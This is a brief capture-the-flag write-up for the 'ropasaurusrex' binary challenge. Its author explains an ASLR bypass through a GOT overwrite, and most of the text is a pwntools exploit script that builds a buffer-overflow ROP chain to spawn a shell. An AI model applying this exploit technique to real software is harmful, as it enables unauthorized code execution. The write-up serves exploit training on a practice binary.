This is one of the best binary problem that i have solved. This problem i have solved 1 year back but i forgot to update.
This problem is completely based on ASLR bypassing, where we are supposed to overwrite GOT table.
As many writeup’s are there to explain this same problem i am not planning to give the entire description of the exploit.
from pwn import * # Run the file (cat inp /dev/stdin)|./ropasaurusrex as the childprocess is being spawned #got_libc_start_main = 0x8049618 #__libc_start_main = 0xf7e22990 #system = 0xf7e49190 #0x080484b5: pop ebx ; pop esi ; pop edi ; pop ebp ; ret ; (1 found) #0x080483bb: xchg eax, esi ; add al, 0x08 ; add dword [ebx+0x5D5B04C4], eax ; ret ; (1 found) #value to ebx :aaa99154 #address of "sh" : 0x804867f payload = '' payload += "A"*140 #offset to reach eip payload += p32(0x080484b5) payload += p32(0xaaa99154) payload += p32(0x268f8) payload += p32(0xdeedbeef) payload += p32(0xcafebabe) payload += p32(0x080483bb) payload += p32(0x0804835c) payload += p32(0x0804867f) print payload